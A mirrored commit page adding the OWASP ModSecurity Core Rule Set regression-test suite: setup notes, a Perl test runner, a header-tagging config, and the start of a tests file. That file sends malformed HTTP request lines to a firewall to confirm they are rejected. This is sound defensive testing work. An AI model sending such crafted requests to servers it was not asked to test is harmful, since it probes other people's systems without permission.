github_mirrors/ModSecurity
3
0
Fork 1
mirror of https://github.com/owasp-modsecurity/ModSecurity.git synced 2025-10-01 12:07:46 +03:00
Code Issues Packages Projects Releases Wiki Activity

Fixed files overwriting in installer; added OWASP CRS.

Browse Source
This commit is contained in:
Greg Wroblewski
2013-02-05 16:36:29 -08:00
parent 635a573894
commit c1ba71ab16
134 changed files with 33445 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

21
iis/ModSecurityIIS/owasp_crs/util/regression_tests/INSTALL Normal file
View File

@@ -0,0 +1,21 @@
INSTALLATION STEPS:
1) Edit the rulestest.pl script to define local path to perl
2) Edit the ruletest.conf script to define the proper global settings for:
- servers to test
- path to the modsecurity audit log
3) Copy the testserver.cgi script to the /cgi-bin directory if you wish to
test the outbound/response rules.
4) Edit the modsecurity_crs_10_config.conf file and update/enable the
Regression Testing variable settings.
5) Copy/Symlink the modsecurity_crs_59_header_tagging.conf file to the
activated_rules directory
6) Restart Apache
7) Run the rulestest.pl script using the rules files in the local /tests
directory.

105
iis/ModSecurityIIS/owasp_crs/util/regression_tests/README Normal file
View File

@@ -0,0 +1,105 @@
ModSecurity Rules regression testing suite
==========================================
Rules regression test tool installation:
----------------------------------------
Test should be run from the same host ModSecurity runs on, or a computer that
has file system access to ModSecurity audit log (see %modseclog in step 5)
1. Copy rulesregtest.pl, rulesregtest.conf and test files to a directory on the
server.
2. Put testserver.cgi in the server's /cgi-bin directory (required only if
outbound tests are used)
3. Set ModSecurity to use serial logging.
4. Ensure that the web server response with 200 to access the home page (since
default tests use "/" as the URL)
5. Edit rulesregtest.conf:
- Server address and port (%server directive). The default (127.0.0.1:80) may
be OK.
- Location of ModSecurity audit log file (%modseclog directive).
Writing tests:
--------------
Write a text file with the following directives:
%test <name> - starts a test and set is name (used for report)
%status <number> - sets the expected status code
%event <string> - set a string to search in the audit log of the test. You can
use multiple directives to define many required patterns. For example:
%event [id "960009"]
%output <string> - set a string to search in the HTTP response. You can use
multiple directives to define many required patterns.
%request <20> multiple lines of the request on the following lines, terminated by
the next directive (a line starting with "%"). A request can include variables
using perl notation ($var). this would be replaced when testing with a value
set by the %var directive.
- Note: Do not forget to leave an empty line as required by HTTP. The script
locks otherwise.
- Note: Content-Length has to be calculated manually.
Finding bugs
------------
The following directives will help to find the problems:
%verbose <20> will output request, reply and new ModSecurity audit log lines for
the current test.
%relevant <20> will output verbose output for tests that failed.
Variable replacement:
---------------------
%var variable=value, value, value<75>.. - Set values for a variable, the test
would be repeated using every value. Values are set only for the current test.
Multiple %var directives for the same variable add values to the list and do
not replace values, so:
%var variable=value1
%var variable=value2
Would test with both value1 and value2.
If multiple variables are used in the same test, than the test is carried for
each combination of values of the variables:
%var var1=v1, v2
%var var3=v3, v4
The test would be repeated 4 times with the test vectors (v1, v3), (v1, v4),
(v2, v3), (v2, v4).
Testing responses:
------------------
To force response content in request, use /cgi-bin/testserver.cgi as the target
URL and add one or more of the following headers to the reuqest:
Response-Status - Force a response status line. Defaults to "200 OK".
Response-Content - Adds the string to the response. Note that this would not be
the entire response.
Response-Content-Type - sets the value of the content type header, defaults to
"text/html"
Response-Header-Name - Add a header to the response. This defined the new
header's name. Response-Header-Value defines the header's value.
Response-Header-Value - The value of the new header defined by the request
header Response-Header-Name. Note: If Response-Header-Name is empty, then this
parameter will be ignored.
** NOT IMPLEMENTED YET **
Response-File - the name of a file to use as the entire response. Name is
reletive to the $RESPONSE_FILE_DIR in the testserver.cgi sctip.
** NOT IMPLEMENTED YET **

38
iis/ModSecurityIIS/owasp_crs/util/regression_tests/modsecurity_crs_59_header_tagging.conf Normal file
View File

@@ -0,0 +1,38 @@
#
# This section is only used during regression testing to externalize the matched
# rule IDs in response headers so the testing client can verify matches from
# remote ModSecurity installs.
#
# WARNING: You do not want this in normal operations as this will expose
# the inner workings of your ModSecurity configurations.
#
# Must enable/configure the TX:REGRESSION_TESTING variable in the
# modsecurity_crs_10_config.conf file.
#
SecRule &TX:REGRESSION_TESTING|TX:REGRESSION_TESTING "@eq 0" "phase:4,t:none,nolog,id:'981228',pass,skipAfter:END_RESPONSE_HEADER_TAGGING"
SecRule TX:ANOMALY_SCORE "@eq 0" "phase:4,id:'981229',t:none,nolog,pass,skipAfter:END_RESPONSE_HEADER_TAGGING"
SecRule TX:/^\d*\-/ "." "phase:4,id:'981230',t:none,nolog,pass,setvar:tx.counter=+1,setenv:matched_rule-%{tx.counter}=%{matched_var_name},setenv:anomaly_score=%{tx.anomaly_score},setenv:sql_injection_score=%{tx.sql_injection_score},setenv:xss_score=%{tx.xss_score}"
Header append X-WAF-Events "%{matched_rule-1}e" env=matched_rule-1
Header append X-WAF-Events "%{matched_rule-2}e" env=matched_rule-2
Header append X-WAF-Events "%{matched_rule-3}e" env=matched_rule-3
Header append X-WAF-Events "%{matched_rule-4}e" env=matched_rule-4
Header append X-WAF-Events "%{matched_rule-5}e" env=matched_rule-5
Header append X-WAF-Events "%{matched_rule-6}e" env=matched_rule-6
Header append X-WAF-Events "%{matched_rule-7}e" env=matched_rule-7
Header append X-WAF-Events "%{matched_rule-8}e" env=matched_rule-8
Header append X-WAF-Events "%{matched_rule-9}e" env=matched_rule-9
Header append X-WAF-Events "%{matched_rule-10}e" env=matched_rule-10
Header append X-WAF-Events "%{matched_rule-11}e" env=matched_rule-11
Header append X-WAF-Events "%{matched_rule-12}e" env=matched_rule-12
Header append X-WAF-Events "%{matched_rule-13}e" env=matched_rule-13
Header append X-WAF-Events "%{matched_rule-14}e" env=matched_rule-14
Header append X-WAF-Events "%{matched_rule-15}e" env=matched_rule-15
Header append X-WAF-Events "%{matched_rule-16}e" env=matched_rule-16
Header append X-WAF-Events "%{matched_rule-17}e" env=matched_rule-17
Header append X-WAF-Events "%{matched_rule-18}e" env=matched_rule-18
Header append X-WAF-Events "%{matched_rule-19}e" env=matched_rule-19
Header append X-WAF-Events "%{matched_rule-20}e" env=matched_rule-20
Header set X-WAF-Score "Total=%{anomaly_score}e; sqli=%{sql_injection_score}e; xss=%{xss_score}e" env=anomaly_score
SecMarker END_RESPONSE_HEADER_TAGGING

20
iis/ModSecurityIIS/owasp_crs/util/regression_tests/rulestest.conf Normal file
View File

@@ -0,0 +1,20 @@
# Set to the address and port of the web server protected by the tested ruleset.
#
# TODO the web server has to respond with status code 200 to request for the
# home page (/). This is usually the default configuration.
#
# TODO the script 'testserver' should be installed on this web server in the
# /cgi-bin directory to facilitate outbound rules testing.
#
#%global server 127.0.0.1:80
# Set to the path to ModSecurity audit file
#
# TODO set ModSecurity for serial logging.
#
#%global mslog /usr/local/apache/logs/audit.log
#%msdebug /usr/local/apache/logs/debug.log
#
# Set this to the appropriate web site domain name you are testing
#
%global var hostname=mysite

936
iis/ModSecurityIIS/owasp_crs/util/regression_tests/rulestest.pl Normal file
View File

@@ -0,0 +1,936 @@
#!/opt/local/bin/perl
#
# Copyright (C) 2006-2011 Trustwave All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENCE file for full details.#
# For Internal Use only!
#
# Originally writtern by Ofer Shezaf
#
# !! todo:
# !! ~ request for URI command in conf file
# !! ~ Ensure headers terminators
# !! read rulesets config file for event mane, policy and patterns
# !! fuz patterns from config file
# !! %include directive
use strict;
#use warnings;
#use diagnostics;
use IO::File;
use IO::Socket;
use IO::Select;
use HTTP::Request;
use HTTP::Response;
use Safe;
use Storable qw(dclone);
use Getopt::Long;
use Pod::Usage;
# -- Add library
use FindBin qw($Bin $Script);
use lib "$Bin";
use Data::Dumper;
autoflush STDOUT;
# -- consts
our $SKELETON_REQUEST = <<END_SKEL
GET \$URI HTTP/1.0
Host: local
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
END_SKEL
;
# -- get options
my $global_state = { 'timeout' => '2', 'fuzz' => 1, 'vars' => {}, 'port' => 80 };
$global_state->{'global'} = $global_state;
GetOptions
(
$global_state,
'server|s:s',
'hostname:s',
'port|p:s',
'timeout|t:f',
'mslog:s',
'msdebug:s',
'o:s',
'i=s@',
'run:s@',
'from:s',
'relevant|r!',
'fuzz|f!',
'clean!',
'check!',
'verbose|v!',
'help|h|?',
'man'
) || pod2usage (-exitstatus => 0, -verbose => 0);
pod2usage(-exitstatus => 1, -verbose => 1) if $global_state->{'help'};
pod2usage(-exitstatus => 1, -verbose => 2) if $global_state->{'man'};
push @{$global_state->{'input'}}, @ARGV;
pod2usage (2) if $#{$global_state->{'input'}} < 0;
# -- get list of test files
my $testfiles = [];
my ($progname) = ($Script =~ /(.*)\..*$/);
if (-e "$progname.conf") {
push @$testfiles, "$progname.conf";
}
foreach my $arg (@{$global_state->{'input'}}) {
push @$testfiles, glob $arg;
}
foreach my $file (@$testfiles) {
if (!-e $file) {
print STDERR "Error 101: test file $file not found\n";
exit;
}
}
my ($outfile, $outfilename);
if ($global_state->{'output'}) {
$outfile = new IO::File ">$global_state->{'output'}";
if (!$outfile) {
print STDERR "Error 106: unable to create report file $global_state->{'output'}. $@\n";
exit;
}
$outfilename = $global_state->{'output'};
}
else {
$outfile = *STDOUT;
$outfilename = 'STDOUT';
}
report_header($outfile, $outfilename);
foreach my $filename (@$testfiles) {
parse_test_file ($outfile, $filename, $global_state);
}
exit (0);
# -- read an input file and execute tests in it
sub parse_test_file
{
my ($outfile, $filename, $parent_state) = @_;
my $file_state = inherit_state ($parent_state);
report_file_header($outfile, $filename);
my $linenumber = 0;
my $testfile = new IO::File "<$filename";
if (!$testfile) {
print STDERR "Error 105: unable to open tests file $filename. $@\n";
print $outfile "unable to open file";
return;
}
my $state = $file_state;
while (defined(my $line=<$testfile>)) {
$linenumber++;
$line = tchomp ($line);
$state = parse_test_line ($line, $state, $testfile);
if (!ref $state) {
print STDERR "$state in file $filename at line $linenumber\n";
print STDERR "line: $line\n" if $parent_state->{'check'};
return;
}
while (my $test = shift @{$file_state->{'tests'}}) {
run_test ($outfile, $test, $filename);
}
}
run_test ($outfile, $state, $filename) if $state->{'name'};
}
# -- parse the next input line
sub parse_test_line
{
my ($line, $state, $file) = @_;
# -- Handle EOF
return $state unless defined $line;
# -- Hande multi line remarks
if ($state->{'multi_line_cmd'} eq "remark") {
undef $state->{'multi_line_cmd'} if ($line =~ /^\%endremark/i);
return $state;
}
# -- Handle multi line directives
if (my $incmd = $state->{'multi_line_cmd'}) {
# -- Request parser
if ($incmd =~ /^request$/i) {
if (my ($len) = $line =~ /^Content-Length: (\d+)$/) {
$state->{'request_len'} = $len;
} elsif ($state->{'request_state'} eq 'headers' && $line =~ /^$/) {
$state->{'request_state'} = 'body';
$state->{'multi_line_value'} .= "$line\x0D\x0A";
if (defined $state->{'request_len'}) {
my $result = read $file, my $buffer, $state->{'request_len'};
return "Error 110: Error reading file" if !defined $result;
return "Error 111: File terminated unexpectedly (read $result char of required $state->{'request_len'})" if $result != $state->{'request_len'};
#print "==>$state->{'multi_line_value'}<==\n$buffer\n----\n";
$state->{'multi_line_value'} .= $buffer;
return $state;
undef $state->{'request_len'};
}
}
}
# X-Real-Content-Length:
# -- Append to value if not yet next directive
if ($line !~ /^\%/) {
$state->{'multi_line_value'} .= "$line\x0D\x0A";
return $state;
}
# -- Otherwise use directive
$state = use_test_directive ($state, $incmd, $state->{'multi_line_value'}, $state->{'multi_line_global'});
return $state if (!ref $state);
undef $state->{'multi_line_cmd'};
undef $state->{'multi_line_value'};
undef $state->{'request_len'};
}
# -- Handle empty lines and single line remarks
return $state if $line =~ /^\s*(\#|$)/;
# -- Parse directive
my ($global);
$line =~ /^\%(\w+)\s*(.*)?$/;
my ($cmd, $operand) = ($1,$2);
if ($cmd =~ /^global$/i) {
$global = 1;
($cmd, $operand) = ($operand =~ /^\s*(\w+)\s*(.*)?$/);
}
if (!$operand) {
$operand = 1;
if ($cmd =~ /^no(.*)$/) {
$cmd = $1;
$operand = 0;
}
}
$cmd = lc $cmd;
# -- Start multi line directives
if ($cmd =~ /^(?:request|remark)$/i) {
$state->{'multi_line_cmd'} = $cmd;
$state->{'multi_line_global'} = $global;
return $state;
}
return use_test_directive ($state, $cmd, $operand, $global);
}
sub use_test_directive
{
my ($state, $cmd, $operand, $global) = @_;
# -- Simple directives
if ($cmd =~ /^(?:server|port|hostname|timeout|verbose|relevant|mslog|msdebug|request|uri|request|fuzz|clean|pause)$/i) {
if ($global) {
$state->{'global'}->{$cmd} = $operand;
}
$state->{$cmd} = $operand;
$state->{'request_state'} = 'headers';
}
# -- List directives
elsif ($cmd =~ /^(?:status|remote_event|event|audit|output)$/i) {
push_state ($state, $state->{'global'}, $cmd, $global, $operand);
}
# -- Variable assignment
elsif ($cmd =~ /^(?:var)$/i) {
my ($var, $values) = ($operand =~ /\s*(\w+)\s*=\s*?(.*)/);
my @values = split /\s*,\s*/, $values;
push_state ($state->{'vars'}, $state->{'global'}->{'vars'}, $var, $global, @values);
}
# -- End test (return to file context)
elsif ($cmd =~ /endtest/i) {
if ($state->{'name'}) {
push @{$state->{'parent'}->{'tests'}}, $state;
}
else {
return "Error 107: %endtest directive without a preceding %test directive";
}
$state = $state->{'parent'};
}
# -- New test (end test and start a new one)
elsif ($cmd =~ /test/i) {
if ($state->{'name'}) {
push @{$state->{'parent'}->{'tests'}}, $state;
$state = inherit_state ($state->{'parent'});
}
else {
$state = inherit_state ($state);
}
$state->{'name'} = $operand;
}
# -- error
else {
return "Error 102: syntax error";
}
return $state;
}
sub reconfigure
{
my ($state) = @_;
my ($restart) = 0;
if ($state->{'clean'}) {
unlink $state->{'mslog'} if $state->{'mslog'};
unlink $state->{'msdebug'} if $state->{'msdebug'};
$restart = 1;
global_clear ($state, 'clean');
}
if ($restart) {
print "## Restarting apache\n";
print STDERR `/usr/local/apache/bin/apachectl restart`;
sleep (1);
}
}
sub inherit_state
{
my ($state) = @_;
my $clone = dclone $state;
$clone->{'parent'} = $state;
$clone->{'global'} = $state->{'global'};
delete $clone->{'tests'};
return $clone;
}
# -- Add values to key in state taking into about both overriding and global
sub push_state
{
my ($hash, $global_hash, $key, $global, @values) = @_;
if ($global) {
push @{$global_hash->{$key}}, @values;
}
elsif (!$hash->{"_OVERRIDE_$key"}) {
$hash->{$key} = [];
}
$hash->{"_OVERRIDE_$key"} = 1;
push @{$hash->{$key}}, @values;
}
sub global_clear
{
my ($state, $key) = @_;
while ($state) {
undef $state->{$key};
$state = $state->{'parent'};
}
}
sub run_test
{
my ($outfile, $state, $file) = @_;
return if $state->{'check'};
if ($state->{'from'}) {
return if $state->{'name'} !~ /$state->{'from'}/;
}
global_clear ($state, 'from');
my $do_test = $#{$state->{'run'}} < 0;
foreach my $select (@{$state->{'run'}}) {
$do_test ||= ($state->{'name'} =~ /$select/);
}
return if !$do_test;
if ($state->{'request'} && $state->{'uri'}) {
print STDERR "Error 103: cannot use both %request and %uri in test $state->{'name'} in file $file\n";
exit;
}
reconfigure($state);
if ($state->{'uri'}) {
$state->{'request'} = $SKELETON_REQUEST;
$state->{'request'} =~ s/\$URI/$state->{'uri'}/;
}
my $requests = $state->{'fuzz'} ?
generate_vectors ($state->{'request'}, $state->{'vars'}, $state->{'verbose'}) :
{'' => $state->{'request'}};
VECTOR: while (my ($vars, $request) = each %$requests)
{
my $test = inherit_state ($state);
$test->{'request'} = $request;
if ($test->{'mslog'}) {
my $output = `wc $test->{'mslog'}`;
$output =~ /\s*(\d+)/;
$test->{'mslog_start'} = $1;
}
if ($test->{'msdebug'}) {
my $output = `wc $test->{'msdebug'}`;
$output =~ /\s*(\d+)/;
$test->{'msdebug_start'} = $1;
}
my ($server, $port) = ($test->{'server'}, $test->{'port'});
if (!$port && ($server =~ /^(.+)\:(\d+)$/)) {
$server = $1;
$port = $2;
}
if ($test->{'hostname'}) {
my $hostname = ($test->{'hostname'});
}
my $sock = IO::Socket::INET->new(PeerAddr => $server, PeerPort => $port);
if (!$sock) {
print STDERR "Error 104: error connecting to server $server. $@\n";
exit;
}
print $sock $request;
my $line;
do {
my @ready;
@ready = IO::Select->new($sock)->can_read($test->{'timeout'});
if ($#ready < 0) {
$test->{'response'} = $test->{'response_status'} = "N/A";
report_test ($outfile, 'TIMEOUT', $test, $request, $vars);
next VECTOR;
}
if (defined($line = <$sock>)) {
$test->{'response'} .= $line;
if (!$test->{'response_status'}) {
if ($line =~ /^HTTP\S*\s+(\d+)/) {
$test->{'response_status'} = $1;
}
elsif ($line =~ /<title>400 Bad Request<\/title>/) {
$test->{'response_status'} = 400;
}
}
}
} while (defined($line));
if ($test->{'mslog'}) {
my $output = `wc $test->{'mslog'}`;
$output =~ /\s*(\d+)/;
my $lines = $1 - $test->{'mslog_start'};
$test->{'mslog'} = `tail -n $lines $test->{'mslog'}`;
}
if ($test->{'msdebug'}) {
my $output = `wc $test->{'msdebug'}`;
$output =~ /\s*(\d+)/;
my $lines = $1 - $test->{'msdebug_start'};
$test->{'msdebug'} = `tail -n $lines $test->{'msdebug'}`;
}
$test->{'match_status'} = check_match ($test->{'response_status'}, $test->{'status'});
$test->{'match_output'} = check_match ($test->{'response'}, $test->{'output'});
$test->{'match_audit'} = !$test->{'mslog'} || check_match ($test->{'mslog'}, $test->{'audit'});
my $test_events;
foreach my $event (@{$test->{'event'}}) {
if ($event =~ /^\!(.*)$/) {
push @$test_events, "!\\[id \\\"$1\\\"\\]"
}
else {
push @$test_events, "\\[id \\\"$event\\\"\\]"
}
}
$test->{'match_events'} = !$test->{'mslog'} || check_match ($test->{'mslog'}, $test_events);
my $result =
($test->{'match_status'}
&& $test->{'match_output'}
&& $test->{'match_audit'}
&& $test->{'match_events'}) ? "OK" : "FAIL" ;
report_test ($outfile, $result, $test, $request, $vars);
sleep $test->{'pause'} if $test->{'pause'};
}
}
sub check_match
{
my ($text, $patterns) = @_;
my $match = 1;
foreach my $pattern (@$patterns) {
if ($pattern =~ /^\!(.*)$/) {
return 0 if $text =~ /$1/sm;
}
else {
return 0 if $text !~ /$pattern/sm;
}
}
return $match;
}
sub report_header
{
my ($outfile, $outfilename) = @_;
print $outfile "\nModSecurity rules test report generated to $outfilename on " . localtime() . "\n";
print $outfile "Produced by rulestest.pl, (c) Trustwave Holdings Inc, 2012\n";
}
sub report_file_header
{
my ($outfile, $filename) = @_;
print $outfile "\n## reading tests file $filename\n";
}
sub report_test
{
my ($outfile, $result, $test, $request, $vars) = @_;
print $outfile "\n" if $result ne "OK";
print $outfile "$result: ";
print $outfile "$test->{'name'}";
print $outfile " ($vars)" if $vars;
print $outfile ", status = $test->{'response_status'}";
#print $outfile ", X-WAF-Event Match" if ($test->{'match_output'});
my (@events) = ($test->{'mslog'} =~ /\[id \"(\d+)\"\]/gim);
print $outfile $#events < 0 ? ", no events received" : ", event(s) = " . (join ",", @events) ;
if ($result eq "FAIL") {
print $outfile "\n";
if (!$test->{'match_status'}) {
print $outfile "Expected status code(s): " . (join ",", @{$test->{'status'}}) . "\n";
}
if (!$test->{'match_events'}) {
print $outfile "Expected event(s): " . (join ",", @{$test->{'event'}}) . "\n";
}
if (!$test->{'match_audit'}) {
print $outfile "Audit does not match\n";
}
if (!$test->{'match_output'}) {
print $outfile "Output does not match\n";
}
#$test->{'match_events'} && print "Events: $test->{'response_status'} and not " . (join ",", $test->{'status'}) . "\n";
print_details ($test) if $test->{'verbose'} || $test->{'relevant'};
}
print $outfile "\n";
print_details ($test) if $test->{'verbose'};
}
sub print_details
{
my ($test) = @_;
print $outfile "---------\nRequest:\n$test->{'request'}\n";
print $outfile "---------\nResponse:\n$test->{'response'}\n";
print $outfile "---------\nLog:\n$test->{'mslog'}\n" if ($test->{'mslog'});
print $outfile "---------\nDebug:\n$test->{'msdebug'}\n" if ($test->{'msdebug'});
}
sub generate_vectors
{
my ($script, $vars, $verbose) = @_;
my $test_requests = [];
my $vectors = [ {} ];
while (my ($var, $values) = each %$vars) {
next if $var =~ /^_OVERRIDE_/;
next if $script !~ /\$$var\b/;
foreach my $vector (@$vectors) {
$vector->{$var} = $values->[0];
}
if ($#$values > 0) {
my $collect_vectors = [];
shift @$values;
foreach my $value (@$values) {
my $new_vectors = dclone $vectors;
foreach my $vector (@$new_vectors) {
$vector->{$var} = $value;
}
push @$collect_vectors, @$new_vectors;
};
push @$vectors, @$collect_vectors;
}
}
$script =~ s/\$([a-zA-Z_]+)/\$vector->{$1}/g;
#print "SCRIPT=>$script\n";
my $results;
foreach our $vector (@$vectors) {
my $var = join ",", map { "$_=$vector->{$_}" } keys %$vector;
$vector->{'CONTENT_LENGTH'} = '$CONTENT_LENGTH';
my $result;
if (!defined($result = eval_expression ($script, $vector, $verbose))) {
print STDERR "Error 109: unable to fuzz request. Not fuzzing test.\n";
return ({'' => $script});
}
#my $req = HTTP::Request->parse($result);
my ($content) = $result =~ /.*?\x0D\x0A\x0D\x0A(.*)/sm;
$vector->{'CONTENT_LENGTH'} = length $1;
$result = eval_expression ($script, $vector, $verbose);
$results->{$var} = $result;
}
return $results;
}
sub eval_expression
{
my ($script, $vector, $verbose) = @_;
$script =~ s/([\"\@\%])/\\$1/g;
my $result;
my $warn;
local $SIG{__WARN__} = sub { $warn = $_[0] };
eval {
my $safe = new Safe;
$safe->share ('$vector');
$result = $safe->reval ("return \"$script\"");
};
if ((my $error = $@) || $warn) {
print STDERR "Error 108: unable to evaluate expression\n";
print STDERR "SCRIPT: $script\n" if $verbose;
print STDERR "EVAL ERROR: $error\n" if $error && $verbose;
print STDERR "EVAL WARNING: $warn\n" if $warn && $verbose;
return undef;
}
return $result;
}
sub tchomp {
my ($text) = @_;
$text =~ s/^(.*?)(?:\x0D\x0A|\x0A|\x0D|\x0C|\x{2028}|\x{2029})/$1/s;
return $text;
}
__END__
=head1 NAME
rulestest.pl
=head1 SYNOPSIS
rulestest.pl [options] [test files ...]
This program reads and executed tests in input test file(s) agains a
ModSecurity protected web application.
use -help for options.
use -man for detailed usage information.
=head1 OPTIONS
the following options can be used either on the command line or (using the
long version) as directives (prefixed by %) in test files.
-s or -server <address>[:<port>]
address of server to send. Mandatory before any test, but can appear
in the test files themselves
-p or -port <port>
port to send tests to, defaults to 80
-t or -timeout <time>
time in seconds, possibly fractional, to wait for server response.
If the server does not respond within this period the test fails.
the default is 10 seconds.
Timeout should be small for synthetic tests, such as those
generated from capture files as the server would respond fast.
The timeout may need to be longer for real world servers.
-f or -fuzz
Whether to use fuzzing or not. You may not want to use fuzzing in
case the requests where generated automatically and may includes
syntax that will be considered by rulestest as substitutable
variables.
-mslog <file name>
ModSecurity log file to search for events in. If not specified
events are not (useful if tests are not run locally).
-msdebug <file name>
ModSecurity debug file to extract debug information
to test report. If not specified, debug information is not
add to the report.
-o <file name>
name of output file. Defaults to STDOUT. Not relevant as directive
in test files.
-i <file name>
Names of input files. can also appear as parameters on the command
line. Not relevant as directive in test files.
-check
Does not run test but only parses the input file
-run <regular expression>
a regular expresion to select tests to perfrom. Only tests whose
name match the regular expression are executed. The option
(or directive) can be used multiple times, so a test matching
any of the regular expressions will be executed.
-from <regular expression>
a regular expression selecting the first test to perform.
-r or -relevant
Detailed information in the test report in case
of a test failure.
-v or -verbose
Detailed information for all tests. Verbose will also cause specific
errors to include print more information.
-c or -clean
deletes log and debug files and restart apache (using apachctl).
Significantly enhance performance of the tests and can be used as
many times as needed in test files.
Clean is executed once, when starting the 1st test after it is
defined regardless of the scope it is defined at. Specifically
it will remove the log and debug files as defined when the test
start: this enables the use of -clean on the command line even
though file locations are defined only later on, for example in
rulestest.conf.
=head1 INSTALLATION & CONFIGURATION
Test should be run from the same host ModSecurity runs on, or a computer that
has file system access to ModSecurity audit log to. This allows rulestest to
examine ModSecurity audit log for events and extract information from
ModSecurity debug log to the test report.
In order to test for events, ensure that ModSecurity is set use serial logging.
=head2 Local and Global Settings:
When used in a file, directives are local to the file, and when used whithin
a test they are local to a test. To specify global settings preced the directive
wiht the keyword global:
%global server 127.0.0.1:80
if a file with the name rulestest.conf exists in the same directory as the
script, it will be read. I can contain any directive valid in a test file.
It can be used to set default
=head2 Binary Attrbiutes:
Directives that except a yes/no value can be set in varios ways. Providing the
value 0 or 1 will set them to no and yes respectively. The directive without
any values is eqvivalent to setting it to 1, and the directive preceded by "no"
is eqvivalent to 0, for example:
%noverbose
will set the current scope to not report verbosely.
=head2 Default Settings:
The file rulestest.conf is automatically read by rulestest.pl before any
tests file and may contain global setup directives. You may especially want to
set there settings such as %server, %mslog and %msdebug as well as reporting
level using %verbose and %relevant.
=head1 WRITING TESTS
To write a test use the following directives:
=head2 defining the test request
%test <name> -
starts a test and set is name as shown in the report
%endtest -
used to terminate a test. Ususally there is no need to use this
directive as the next %test directive implicitly defines the end of
a test. You may want to use it if you want to set additional file
level settings for the remaining tests.
%remark -
Ignore all lines (including directives) until a matching %endremark
directive. use # at the beginning of a line to add a remark line to
the file, if not in the middle of a multi-line directive such as
%request.
%request -
multiple lines of the request should appear on the lines follwing
the directive terminated by the next =directive (a line starting
with "%"). Do not forget to leave an empty line as required by
HTTP.
You can use the special variable $CONTENT_LENGTH to have
rulestest set the correct content length for the request.
$CONTENT_LENGTH can save counting, but its main use is to enable
fuzzing of requests with variables in the post data.
%uri -
a uri to send to the server. it would be embedded in a
standard request
%pause -
define a delay in seconds after the test and before the next test.
Useful if the feature tested involves timeouts.
either a %uri or a %request directive must appeat in a test. A %request or a
%uri can include variables using perl notation ($varname). this would be
replaced when testing with a value set by the %var directive.
Empty lines are skipped if not in the middle of multi-line directives such
as %request.
=head2 defining expected output
%status <regexp> -
The expected response status code(s).
%event <regexp> -
A regexp that should match event ids generated by the test in
the audit log.
%audit <regexp> -
A regexp that should match in the audit log of the test.
%output <regexp> -
A regexp that should match in set a string to search in the HTTP
response. You can use multiple directives to define many required
patterns.
for %event, %audit and %output you can use multiple directives to define
many required patterns. All of them must match for the rule to match. Use the
regular expresion or (|) option to check for at least one option from a group
of patterns.
Each regular expression can be preceded by a "!" mark to negate the test. the
regular expression following must not appear in the test result.
=head1 REPORTING
By default rulestest will provide brief message describing if the test succeded
in any of the checks done: status code, events generated, pattern in audit log
and pattern in response.
the following directives allow control on the level of details of the report:
%verbose -
from the test for which the directive appears onward, output request,
reply and new ModSecurity audit log lines for each test. set to 0 to
stop (1 is implicit on set).
%relevant -
from the test for which the directive appears onward, output verbose
output for tests that failed any check. set to 0 to stop (1 is
implicit on set).
In most cases, you will only be interested in the failed tests. In that case,
you can use awk with the following command:
gawk '$1=="OK:" {printme=0}; $1=="FAIL:" {printme=1}; $1=="##" {printme=1}; printme==1 {print}'
=head1 VARIABLE SUBSTITUTION (FUZZING)
The directive "%var variable=value[, value[, valueM-^E..]] sets values for a
variable which are embedded in the request sent. The test would be repeated
using every value. Values are set only for the current test. Use the
%globalvar directive to set global variables.
Multiple %var directives for the same variable add values to the list and do
not replace values, so:
%var variable=value1
%var variable=value2
Would test with both value1 and value2.
If multiple variables are used in the same test, than the test is carried for
each combination of values of the variables:
%var var1=v1, v2
%var var3=v3, v4
The test would be repeated 4 times with the test vectors (v1, v3), (v1, v4),
(v2, v3), (v2, v4).
As noted before, the special variable $CONTENT_LENGTH can be used to
automatically calculate the content length based on the actually generated
request after variable substitution.
=head1 TESTING RESPONSES
In order for outbound tests the script testserver.cgi has to be installed in
the web server's /cgi-bin directory.
To force response content in request, use /cgi-bin/testserver.cgi as the target
URL and add one or more of the following headers to the reuqest:
Response-Status: - Force a response status line. Defaults to "200 OK".
Response-Content: - Adds the string to the response. Note that this would not be
the entire response.
Response-Content-Type: - sets the value of the content type header, defaults to
"text/html"
Response-Header-Name: - Adds a header to the response. This defined the new
header's name. Response-Header-Value defines the header's value.
Response-Header-Value: - The value of the new header defined by the request
header Response-Header-Name. Note: If Response-Header-Name is empty, then this
parameter will be ignored.
=head1 ERRORS
Error 101:
test file <file> not found. Check that all options are valid and no
option was considered a test file.
Error 102:
syntax error in file <file> on line <line>. a line which is not
a remark, not a directive and not in any multiline section (request
and multi line remark) was found at specified line and file.
Error 103:
cannot use both %request and %uri. Only one of these directive can
be specified in each test.
Error 104:
error connecting to server. The specific error is also displayed.
This error usually implies a communication problem or specificaiton
of a wrong server or port.
Error 105:
Error occured when trying to open a tests file. Tests will continue
with next tests file.
Error 106:
Error occured when trying to create report file.
Error 107:
%endtest directive without a preceding %test directive
Error 108:
The expression evulator (using Perl eval function) failed. The
expression probably includes some Perl syntax. use -verbose to
print the actual error returned.
Error 109:
Fuzzing the request failed. This probably implies that the test
request includes some Perl syntax. You may want to use the nofuzz
option to overcome the problem.
=cut

599
iis/ModSecurityIIS/owasp_crs/util/regression_tests/tests/modsecurity_crs_20_protocol_violations.tests Normal file
View File

@@ -0,0 +1,599 @@
%timeout 10
# FILE 20 - protocol violations
%test Invalid HTTP Request Line (960911) - Test 1
#####################################################
%remark
This test has a TAB character before the request method.
%endremark
%status 400|403
%request
GET / HTTP/1.1
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Invalid HTTP Request Line (960911) - Test 2
#####################################################
%remark
This test uses backslashes instead of forward slashes.
%endremark
%status 400|403
%request
GET \index.html HTTP\1.0
Host: $hostname
